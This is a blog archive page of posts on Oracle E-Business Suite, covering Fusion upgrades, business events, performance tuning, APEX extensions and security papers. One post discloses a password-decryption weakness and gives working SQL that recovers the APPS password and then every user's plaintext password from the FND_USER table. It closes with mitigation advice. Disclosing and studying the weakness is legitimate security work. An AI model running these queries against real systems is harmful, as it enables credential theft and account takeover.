Fusion is just like E-Business Suite… Not!
For all of you EBS gurus out there, take comfort in knowing that there are similarities between Fusion and EBS. Not everything is similar though, and in some cases, it may be easier to forget your knowledge of “how EBS does it” and learn “how Fusion does it” without trying to translate.
via Oracle Fusion Financials Blog.
Leave a comment | Filed in Oracle | Tags: EBSUpgrading from Oracle E-business Suite to Fusion Apps
There is a third issue, after support cost, and availability, there is the big issue around the upgrade path. Oracle have always said that there would be an upgrade path from the latest two releases which at the time was 11.5.10 and 12.0, but now we also have 12.1 so there is only a path from 12.0 onwards. Is this fair, well I am not sure, in most cases I see the move to Fusion Apps as a replacement is not the best thing for an organisation, especially one who has not already moved to R12, so not having the option is not a problem.Comments Off | Filed in Oracle | Tags: EBS, fusion
[...]
I think a lot of people will take Fusion but in small steps, taking the co-existence route, after perhaps adopting some technology first, over time.
How To Create and Use Custom Business Events in Oracle E-Business Suite
Oracle Workflow, a component of Oracle E-Business Suite, lets you set up subscriptions to business events which can launch workflows or enable messages to be propagated from one system to another when business events occur.
The Oracle Workflow Business Event System is an application service that leverages the Oracle Advanced Queuing (AQ) infrastructure to communicate business events between systems.
Predefined events are provided with some Oracle E-Business Suite products. For example, the “Create Person Event” (oracle.apps.ar.hz.Person.create) is the name of a seeded business event in the Receivables application. The event is triggered when a person party record is created within the Trading Community Architecture (TCA).
Not all events are seeded. However, Oracle gives you the option to create a custom event. An example would be an event that is triggered when an invoice is matched to a purchase order.
In this article, I will show you how to create and use a custom business event. I will go through the following steps:
- Create a custom business event
- Create a subscription to the event
- Raise the event from PL/SQL
Consume the event in PL/SQL
For those of you keeping the faith with Oracle EBS 11i, it’s time to upgrade
Floyd Teter on Oracle E-Business Suite:
Here’s the upshot for those of you “keeping the faith” with 11i. The iceberg is melting, the curtain is coming down, the lights are dimming, the fat lady is singing. The later versions of 11i were good things…we got bundles of value out of 11i…but, like it or not, it’s winding down in favor of a better product in R12.1.3. It’s time to upgrade. Frankly, the longer you keep the faith with 11i, the more you’ll miss out on the value of the new products…and the more it will cost when you do make the move.Comments Off | Filed in Oracle | Tags: EBS
Best Practices for Oracle E-Business Suite Performance Tuning
Isam Alyousfi and Lester Gutierrez are key members of our Applications Performance Group. They recently presented their popular session covering performance tuning tips for all layers of the E-Business Suite at OAUG/Collaborate earlier this year. [...] This presentation is chock full of tips, pointers, and hard-won knowledge. It represents the distillation of countless performance-related Service Requests and customer escalations. If you’re grappling with performance issues in your environment, or simply trying to squeeze more performance out of existing hardware, I’d strongly recommend downloading this presentation.
Tuning All Layers Of E-Business Suite – Performance Topics
Comments Off | Filed in Oracle | Tags: EBS, performance, presentationOracle EBS Customization and Extension – OAF vs ADF vs APEX vs Forms »
The E-Business Suite Technology Group recently released a whitepaper: Extending E-Business Suite 12.1.3 using Oracle Application Express. In summary, “This new whitepaper outlines how to extend Oracle E-Business Suite 12.1.3 (and higher) functionality using Oracle Application Express. Recommended architecture and security considerations are discussed in detail.” For some time now EBS customers have used APEX to extend EBS, with the release of this whitepaper the EBS Tech group has acknowledged the growing use of APEX to extend EBS and have provide recommendations and guidelines for integration.Comments Off | Filed in Links, Oracle | Tags: adf, apex, EBS, oaf
What’s this all about some might ask, is Oracle moving to incorporate APEX as part of the standard EBS tech stack? What about OAF? Isn’t Fusion Applications build on ADF, so what’s up? Well when it comes to Oracle EBS extension and customization, OAF is till the top dog, the E-Business Suite Technology Group continues to recommend OAF for EBS extensions.
5 Recent Oracle Security Related Documents
Oracle Applications 11i Encrypted Password String Disclosure (PDF): An undisclosed security vulnerability exists in Oracle Applications 11i that may allow an unauthenticated, internal attacker to obtain Oracle Applications’ user account encrypted password strings, which in turn can be decrypted using previously published information. An attacker can potentially obtain either any user’s password or the Oracle Applications’ main database account password (APPS).
Building an Audit Trail in an Oracle Applications Environment (PDF): Sarbanes-Oxley’s section 404 requires a company’s key systems be audited. However, many companies have “unauditable” systems and don’t even know it. This paper explores methods by which companies can create an auditable system by implementing various levels of audit trails in Oracle Applications.
Dissecting the Redo Logs (PDF): This paper delves into the guts of the undocumented binary format of the redo logs and shows the forensics examiner, if there is evidence to be found, how to find it and how it can be integrated into a time line of events. It also explores how an attacker can attempt to cover their tracks and how to spot this.
Locating dropped objects (PDF): This paper shows, even when an object has been dropped and purged from the system there will be, in the vast majority of cases, fragments left “lying around†which can be sewn together to build an accurate picture of what the actions the attacker took. Perhaps, depending upon how quickly an investigation takes place from the incident in question, even all data pertaining to the dropped object or objects may still be found.
Isolating Evidence of Attacks Against the Authentication Mechanism (PDF): This paper looks at attacks against the authentication mechanism and evidence to check whether a logon attempt was successful or not. It also looks at other attacks leveled at the authentication process including SID guessing, user enumeration and brute forcing of passwords over the network. Moreover, the paper looks at the differences between a logon attempt via the FTP and Web services provided with the XML Database and directly with the RDBMS itself.
Oracle E-Business Suite Release 12 Electronic Technical Reference Manual Up And Running
We are in the process of upgrading our Oracle E-Business Suite (EBS) from 11.0.3 to 11.5.10 (more on that later). So, I frequently visit the EBS Electronic Technical Reference Manual (eTRM) to browse and try to understand the data models, database design and APIs of some EBS modules. When I logged in this morning I noticed that the eTRM for EBS release 12 had been posted. I thought of sharing this news with you.
Note: you need a Metalink account in order to be able to browse the eTRM.
Comments Off | Filed in Oracle | Tags: EBSOracle E-Business Suite Vulnerability: Users Passwords Decrypted
Johan Louwers published an Oracle Applications passwords decryption vulnerability that allows a malicious user to expose the passwords of any Oracle Applications user. In Oracle E-Business Suite, usernames and their encrypted passwords are stored in the table fnd_user:
SQL> desc fnd_user;
Name Null? Type
----------------------------------------- -------- ----------------
USER_ID NOT NULL NUMBER(15)
USER_NAME NOT NULL VARCHAR2(100)
LAST_UPDATE_DATE NOT NULL DATE
LAST_UPDATED_BY NOT NULL NUMBER(15)
CREATION_DATE NOT NULL DATE
CREATED_BY NOT NULL NUMBER(15)
LAST_UPDATE_LOGIN NUMBER(15)
ENCRYPTED_FOUNDATION_PASSWORD NOT NULL VARCHAR2(100)
ENCRYPTED_USER_PASSWORD NOT NULL VARCHAR2(100)
...
The column ENCRYPTED_USER_PASSWORD stores the encrypted value of the user’s password. The column ENCRYPTED_FOUNDATION_PASSWORD stores the encrypted value of the guest user.
To decrypt the ENCRYPTED_USER_PASSWORD you need access to the DECRYPT function in the APPS.FND_WEB_SEC package. Since DECRYPT is a private function, you need to add the declaration of this function to the package specification so that you can use it outside the package.
FUNCTION decrypt(key IN VARCHAR2, value IN VARCHAR2)
RETURN VARCHAR2;
The key is the decrypted ENCRYPTED_FOUNDATION_PASSWORD. The value is the ENCRYPTED_USER_PASSWORD.
So, the first step in the decryption of a user’s password is to decrypt the ENCRYPTED_FOUNDATION_PASSWORD. This can be accomplished by executing the following query:
WITH guest AS
(
SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
1,
INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
'/'
)
- 1
)
) user_name
FROM DUAL)
SELECT fnd_web_sec.decrypt (guest.user_pwd,
fnd_user.encrypted_foundation_password
) apps_password
FROM fnd_user,
guest
WHERE fnd_user.user_name = guest.user_name
Now, using the above query, we can now decrypt all the values in the FND_USER.ENCRYPTED_USER_PASSWORD column:
WITH guest AS
(
SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
1,
INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
'/'
)
- 1
)
) user_name
FROM DUAL)
SELECT fnd_user.user_name,
fnd_web_sec.decrypt
((SELECT fnd_web_sec.decrypt
(guest.user_pwd,
fnd_user.encrypted_foundation_password
) apps_password
FROM fnd_user,
guest
WHERE fnd_user.user_name = guest.user_name),
fnd_user.encrypted_user_password
) decrypted_user_password
FROM fnd_user
ORDER BY fnd_user.user_name
VOILA!
Of course, in order for the above queries to work, you have to have the privilege to modify and compile the package APPS.FND_WEB_SEC. Assuming that you do have this privilege on a development instance and assuming that passwords are not reset when a development instance is refreshed from a production instance, this can represent a serious security risk.
Updated a few hours later: Stephen Kost just blogged about this subject. He writes that since the decryption routine is a Java class, it is actually easy to create a Java application that calls the decrypt method. So, no need to even have access to a database to run the decrypt. Moreover, he does not expect Oracle to fix this password weakness in the foreseeable future. He also offers a few recommendations to improve the security of the user passwords, like making sure that APPLSYSPUB does not have SELECT privileges on APPS.FND_USER_VIEW, changing the passwords for all Oracle Applications 11i seeded accounts, creating all new user accounts with strong and unique passwords and limiting access to the APPLSYS.FND_USER and APPLSYS.FND_ORACLE_USERID tables by all non-DBA accounts.
Updated January 9 2007: Oracle Applications Password Decryption (PDF)
18 Comments | Filed in Oracle, Security | Tags: EBS, hackOracle E-Business Suite technology stack and products cheat sheet
Steven Chan has just published a couple of useful posts. The first is a high level map of Oracle’s latest E-Business Suite Release 11i technology stack architecture:
The second is a cheat sheet that explains the relationships between Oracle marketing brands, products, product families, versions, and patchsets. He gives simple term definition to the following:
- Oracle E-Business Suite Release 11i
- Oracle Application Server 10g
- Oracle Database
- Fusion Middleware
- Fusion Applications
- E-Business Suite Release and Patch Naming Conventions
- Oracle Application Server 10g Releases
- Patch Compatibility and Certification Matrix
Thanks Steve.
Comments Off | Filed in Oracle | Tags: cheat-sheet, EBS
